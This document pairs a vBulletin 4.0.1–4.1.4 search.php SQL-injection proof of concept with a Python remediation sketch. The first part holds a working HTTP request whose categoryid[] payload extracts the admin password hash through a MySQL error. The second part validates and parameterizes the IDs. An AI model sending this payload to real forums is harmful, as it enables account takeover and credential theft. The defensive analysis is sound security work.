POST /search.php?do=process HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
The result we get:
<!--
Database error in vBulletin 4.1.4:
Invalid SQL:
SELECT socialgroupcategory.title
FROM socialgroupcategory AS socialgroupcategory
WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);
MySQL Error : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'
Error Number : 1062
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Error Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Script : http://127.0.0.1/search.php?do=process
Referrer :
IP Address : 127.0.0.1
Username : Unregistered
Classname : vB_Database
MySQL Version :
-->
vBulletin "Search UI" SQL Injection vbb 4.0.1 > 4.1.4
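A defender-side sketch of the fix for the query shown in the error output above, added here as an example and not taken from vBulletin's code: each categoryid[] value is validated as an integer and then bound as a parameter instead of being concatenated into the IN (...) list. The function names, the sqlite3 stand-in for MySQL, and the sample rows and request bodies are assumptions constructed for the illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Only a plain (optionally negative) decimal integer is accepted.
INT_RE = re.compile(r"-?\d{1,10}", re.ASCII)

def category_ids(form_body):
    """Return the categoryid[] values as ints; raise ValueError otherwise."""
    fields = parse_qs(form_body, keep_blank_values=True)
    ids = []
    for raw in fields.get("categoryid[]", []):
        value = raw.strip()
        if not INT_RE.fullmatch(value):
            # Truncate what is logged so a long payload cannot flood the log.
            raise ValueError("non-integer categoryid[] value: %r" % raw[:40])
        ids.append(int(value))
    return ids

def category_titles(db, ids):
    """Look up titles with one bound placeholder per id (no concatenation)."""
    if not ids:
        return []
    marks = ",".join("?" * len(ids))  # "?,?,?" for three ids
    sql = ("SELECT title FROM socialgroupcategory "
           "WHERE socialgroupcategoryid IN (%s) ORDER BY title" % marks)
    return [row[0] for row in db.execute(sql, ids)]

def demo_db():
    """In-memory table with constructed rows, standing in for the real one."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE socialgroupcategory "
               "(socialgroupcategoryid INTEGER, title TEXT)")
    db.executemany("INSERT INTO socialgroupcategory VALUES (?, ?)",
                   [(1, "General"), (2, "Sports")])
    return db

# Constructed request bodies: one well-formed, one carrying SQL text.
GOOD_BODY = "do=process&contenttypeid=5&categoryid[]=1&categoryid[]=2"
BAD_BODY = "do=process&contenttypeid=5&categoryid[]=-99) union select 1 -- "

if __name__ == "__main__":
    print(category_titles(demo_db(), category_ids(GOOD_BODY)))
    try:
        category_ids(BAD_BODY)
    except ValueError as exc:
        print("rejected:", exc)
```

The rejected value is also a useful detection signal: a non-integer categoryid[] in a search.php?do=process request is worth logging and alerting on.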